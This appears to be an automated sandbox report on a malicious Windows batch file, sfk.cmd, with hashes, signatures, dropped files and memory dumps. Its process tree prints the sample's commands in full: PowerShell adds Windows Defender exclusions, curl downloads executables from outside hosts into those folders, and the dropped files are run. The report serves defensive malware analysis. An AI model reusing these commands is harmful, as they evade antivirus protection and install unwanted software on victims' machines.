03756119185c012ae7a36f165a5f0236dbadca1a0314ba3fbeab826565dbd848

Analysis

max time kernel
294s
max time network
252s
platform
windows10-2004_x64
resource
win10v2004-20230220-es
resource tags

arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
21/03/2023, 17:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sfk.cmd
Size

3KB
MD5

c8a9a54268e70aeb7fe228ae95b2ecdc
SHA1

ca51405c2298d2d1a3e448002d368887ebc67b2a
SHA256

03756119185c012ae7a36f165a5f0236dbadca1a0314ba3fbeab826565dbd848
SHA512

18d5253f5ee486eddbcc1dffcf169aa25be35c04cb60993aaac7ae18a9fb14032d3bf4121d971703bb620ab138db63e21c8102cc37b6872756deb2901308b5a7

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
404	[space]= .exe
940	[space]= .exe
4276	[space]= .tmp

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1372	powershell.exe
1372	powershell.exe
3544	powershell.exe
3544	powershell.exe
4328	powershell.exe
4328	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	404	[space]= .exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1272 wrote to memory of 2256	1272	cmd.exe	85
PID 1272 wrote to memory of 2256	1272	cmd.exe	85
PID 1272 wrote to memory of 1372	1272	cmd.exe	86
PID 1272 wrote to memory of 1372	1272	cmd.exe	86
PID 1272 wrote to memory of 4156	1272	cmd.exe	87
PID 1272 wrote to memory of 4156	1272	cmd.exe	87
PID 1272 wrote to memory of 404	1272	cmd.exe	88
PID 1272 wrote to memory of 404	1272	cmd.exe	88
PID 1272 wrote to memory of 404	1272	cmd.exe	88
PID 404 wrote to memory of 3968	404	[space]= .exe	92
PID 404 wrote to memory of 3968	404	[space]= .exe	92
PID 404 wrote to memory of 3968	404	[space]= .exe	92
PID 3968 wrote to memory of 4916	3968	cmd.exe	94
PID 3968 wrote to memory of 4916	3968	cmd.exe	94
PID 3968 wrote to memory of 4916	3968	cmd.exe	94
PID 3968 wrote to memory of 3544	3968	cmd.exe	95
PID 3968 wrote to memory of 3544	3968	cmd.exe	95
PID 3968 wrote to memory of 3544	3968	cmd.exe	95
PID 3968 wrote to memory of 4360	3968	cmd.exe	99
PID 3968 wrote to memory of 4360	3968	cmd.exe	99
PID 3968 wrote to memory of 4360	3968	cmd.exe	99
PID 3968 wrote to memory of 3900	3968	cmd.exe	100
PID 3968 wrote to memory of 3900	3968	cmd.exe	100
PID 3968 wrote to memory of 3900	3968	cmd.exe	100
PID 1272 wrote to memory of 4328	1272	cmd.exe	101
PID 1272 wrote to memory of 4328	1272	cmd.exe	101
PID 3968 wrote to memory of 940	3968	cmd.exe	102
PID 3968 wrote to memory of 940	3968	cmd.exe	102
PID 3968 wrote to memory of 940	3968	cmd.exe	102
PID 940 wrote to memory of 4276	940	[space]= .exe	103
PID 940 wrote to memory of 4276	940	[space]= .exe	103
PID 940 wrote to memory of 4276	940	[space]= .exe	103

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sfk.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Windows\system32\reg.exe
  reg query "HKU\S-1-5-19\Environment"
  2⤵
  PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe add-mpPreference -exclusionPath "'C:\Users\Admin\AppData\Local\Temp\14112109124808'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Windows\system32\curl.exe
  curl.exe --insecure -o "C:\Users\Admin\AppData\Local\Temp\14112109124808\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
  2⤵
  PID:4156
- C:\Users\Admin\AppData\Local\Temp\14112109124808\[space]= .exe
  "C:\Users\Admin\AppData\Local\Temp\14112109124808\[space]= .exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\\77a1a846-b460-490a-8e7d-fa3c3a16a4ec.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe add-mpPreference -exclusionPath "'C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3544
  - - C:\Windows\SysWOW64\curl.exe
      curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
      4⤵
      PID:4360
  - - C:\Windows\SysWOW64\curl.exe
      curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe" https://sfoq-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
      4⤵
      PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe
      "C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:940
    - - C:\Users\Admin\AppData\Local\Temp\is-NALFN.tmp\[space]= .tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NALFN.tmp\[space]= .tmp" /SL5="$501D6,24981392,227328,C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe"
        5⤵
        Executes dropped EXE
        
        PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe Remove-MpPreference -exclusionPath "C:\Users\Admin\AppData\Local\Temp\14112109124808"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4328

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
518324bffbae4287deecdb4a2b328c7c

SHA1
d980c9205b3a8bfd9712bf9e716c8ef4347be7d3

SHA256
38dc89142aa9171a04eea790520fe3ef557bd4e42b6ea79672e7cbaaa0bd67f5

SHA512
47f371d01a0624c216f52cc278cdb4951ff2ee9c11c547e3eadd3b4f5cd500b3f7cf867ce698f47a18e8caf02642fbf3407ab1ca5bbeb22331ce2b7f07582026

Download Submit
C:\Users\Admin\AppData\Local\Temp\14112109124808\[space]= .exe

Filesize
88KB

MD5
d15daef371b50fb739401bfde29df35a

SHA1
d916c598aff72aaf461a5427cd7c6440c199ff24

SHA256
ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71

SHA512
4145f4a52d7098b5543efefdbf2810b403ba82036f2ef254f458d0084da839636f9d4dc5ec3016065fdfccf6468da301c4da523ece1244fd23efb1fd288d5529

Download Submit
C:\Users\Admin\AppData\Local\Temp\14112109124808\[space]= .exe

Filesize
88KB

MD5
d15daef371b50fb739401bfde29df35a

SHA1
d916c598aff72aaf461a5427cd7c6440c199ff24

SHA256
ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71

SHA512
4145f4a52d7098b5543efefdbf2810b403ba82036f2ef254f458d0084da839636f9d4dc5ec3016065fdfccf6468da301c4da523ece1244fd23efb1fd288d5529

Download Submit
C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\77a1a846-b460-490a-8e7d-fa3c3a16a4ec.cmd

Filesize
6KB

MD5
4c31a37bb0d4cf268336e967c6f1373e

SHA1
c248bb956c084810ed74639cc5ddc9c7b196597a

SHA256
e7807413aafdf07b87ef0ba3aade3717b8d345b2f8ae2c8bcd984d6aa8777c72

SHA512
800ee52453f2c10d0b6a32f971a35ec61116d6ed70fb59d7aa7203d234022696b4794b09a15fdc35a9d71a0215446bf1c5063d4c21b612cc31466e1257c11c3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe

Filesize
24.4MB

MD5
36a056f48f9bc670e0c7b8dadce168a8

SHA1
f218b960d78a321018578b9e8a1e83dd5c16bb8d

SHA256
a577b5eed317617b03703f2b904922f2022ad90109b855e9b45375bf1c8fb2fa

SHA512
537ea90ec289eeb7c45e356213bd9a2b8421fba080882346e4b2abd95e5afec18b304c9cb626273cf53fb4a2320679fb3898392ffc6e5b8dc76fbe60e1613d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\[space]= .exe

Filesize
24.4MB

MD5
36a056f48f9bc670e0c7b8dadce168a8

SHA1
f218b960d78a321018578b9e8a1e83dd5c16bb8d

SHA256
a577b5eed317617b03703f2b904922f2022ad90109b855e9b45375bf1c8fb2fa

SHA512
537ea90ec289eeb7c45e356213bd9a2b8421fba080882346e4b2abd95e5afec18b304c9cb626273cf53fb4a2320679fb3898392ffc6e5b8dc76fbe60e1613d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\77a1a846-b460-490a-8e7d-fa3c3a16a4ec\l

Filesize
63B

MD5
4e7bafc2945c5c110154feb84127534e

SHA1
6a4317b7bb34c804ff70cc410aeaff9519982922

SHA256
a977a77518784eed8cd51e1c89755a1de97c9e9004e93c8e8f31bfc0937784d6

SHA512
ce821481395c5d8c1caa1750ee8b4f8dce6609d7f60fb4d1f4ee4079e6573dd10a0354cb5b1a46d569ffe32c545acd253268f008c0a5e32e44ba7a6bdbea508e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pseylaac.t3p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-NALFN.tmp\[space]= .tmp

Filesize
1.2MB

MD5
bfa3f09deee00832d000f497ec5b570a

SHA1
9d4ed9bb876e66258392aa51c9b1c0f67d38a6ae

SHA256
f01cfa202969c9fe931cb95e47ff59700f9eb924014ed349e0a731b3b7327518

SHA512
a89043f52655eb0e189a5a1f5d72bf049a855d1795d0fa0e66ea949fc6f20a5336154d4a3fc2f3480e132751963c6af2a68806623ef0651d8cc513be7e1dce70

Download Submit
C:\Users\Admin\AppData\Local\Temp\sfkname.tmp

Filesize
13B

MD5
1bc225ba0ec9cf58344a4d5386858f5d

SHA1
9242d5584d8ce4395f7b487a958f641507b484c5

SHA256
c20b721b6d405b01a7b225372393bacf0833572fa455fc2dac6320190f7bb352

SHA512
bbe0e20f32fccf69770bb9c3422e5fb896d5477cb248ca449da686921d4d31a5354574f5a775ae6185336c5eac7c97ae5f74c54f85fc6ec3a464ed012f68643c

Download Submit
memory/404-211-0x00000000053C0000-0x00000000053D0000-memory.dmp

Filesize
64KB

Download
memory/404-158-0x00000000053C0000-0x00000000053D0000-memory.dmp

Filesize
64KB

Download
memory/404-159-0x00000000053C0000-0x00000000053D0000-memory.dmp

Filesize
64KB

Download
memory/404-157-0x00000000053B0000-0x00000000053BA000-memory.dmp

Filesize
40KB

Download
memory/404-154-0x00000000009D0000-0x00000000009EC000-memory.dmp

Filesize
112KB

Download
memory/404-156-0x0000000005410000-0x00000000054A2000-memory.dmp

Filesize
584KB

Download
memory/404-212-0x00000000053C0000-0x00000000053D0000-memory.dmp

Filesize
64KB

Download
memory/404-155-0x0000000005920000-0x0000000005EC4000-memory.dmp

Filesize
5.6MB

Download
memory/940-231-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/940-239-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/1372-146-0x00000195B5B80000-0x00000195B5B90000-memory.dmp

Filesize
64KB

Download
memory/1372-147-0x00000195B8E30000-0x00000195B8F32000-memory.dmp

Filesize
1.0MB

Download
memory/1372-145-0x00000195B5B80000-0x00000195B5B90000-memory.dmp

Filesize
64KB

Download
memory/1372-144-0x00000195B8900000-0x00000195B8910000-memory.dmp

Filesize
64KB

Download
memory/1372-140-0x00000195B8930000-0x00000195B8952000-memory.dmp

Filesize
136KB

Download
memory/1372-133-0x00000195B8990000-0x00000195B8A12000-memory.dmp

Filesize
520KB

Download
memory/3544-175-0x0000000005530000-0x0000000005596000-memory.dmp

Filesize
408KB

Download
memory/3544-183-0x0000000005C60000-0x0000000005C7E000-memory.dmp

Filesize
120KB

Download
memory/3544-195-0x0000000006220000-0x000000000623E000-memory.dmp

Filesize
120KB

Download
memory/3544-196-0x00000000047E0000-0x00000000047F0000-memory.dmp

Filesize
64KB

Download
memory/3544-197-0x00000000075C0000-0x0000000007C3A000-memory.dmp

Filesize
6.5MB

Download
memory/3544-198-0x0000000006F80000-0x0000000006F9A000-memory.dmp

Filesize
104KB

Download
memory/3544-199-0x0000000006FF0000-0x0000000006FFA000-memory.dmp

Filesize
40KB

Download
memory/3544-200-0x00000000071C0000-0x000000000720A000-memory.dmp

Filesize
296KB

Download
memory/3544-201-0x00000000072B0000-0x0000000007346000-memory.dmp

Filesize
600KB

Download
memory/3544-202-0x0000000007220000-0x000000000722E000-memory.dmp

Filesize
56KB

Download
memory/3544-203-0x0000000007280000-0x000000000729A000-memory.dmp

Filesize
104KB

Download
memory/3544-204-0x0000000007270000-0x0000000007278000-memory.dmp

Filesize
32KB

Download
memory/3544-184-0x0000000006C20000-0x0000000006C52000-memory.dmp

Filesize
200KB

Download
memory/3544-185-0x000000006F070000-0x000000006F0BC000-memory.dmp

Filesize
304KB

Download
memory/3544-182-0x0000000005B10000-0x0000000005C12000-memory.dmp

Filesize
1.0MB

Download
memory/3544-180-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/3544-171-0x0000000005450000-0x00000000054B6000-memory.dmp

Filesize
408KB

Download
memory/3544-168-0x0000000004D80000-0x0000000004DA2000-memory.dmp

Filesize
136KB

Download
memory/3544-167-0x0000000004B00000-0x0000000004B82000-memory.dmp

Filesize
520KB

Download
memory/3544-163-0x0000000002190000-0x00000000021C6000-memory.dmp

Filesize
216KB

Download
memory/3544-166-0x0000000004E20000-0x0000000005448000-memory.dmp

Filesize
6.2MB

Download
memory/3544-164-0x00000000047E0000-0x00000000047F0000-memory.dmp

Filesize
64KB

Download
memory/3544-165-0x00000000047E0000-0x00000000047F0000-memory.dmp

Filesize
64KB

Download
memory/4276-238-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/4276-240-0x0000000000400000-0x0000000000547000-memory.dmp

Filesize
1.3MB

Download
memory/4276-241-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/4328-230-0x000002D7AF4D0000-0x000002D7AF4E0000-memory.dmp

Filesize
64KB

Download
memory/4328-229-0x000002D7AF4D0000-0x000002D7AF4E0000-memory.dmp

Filesize
64KB

Download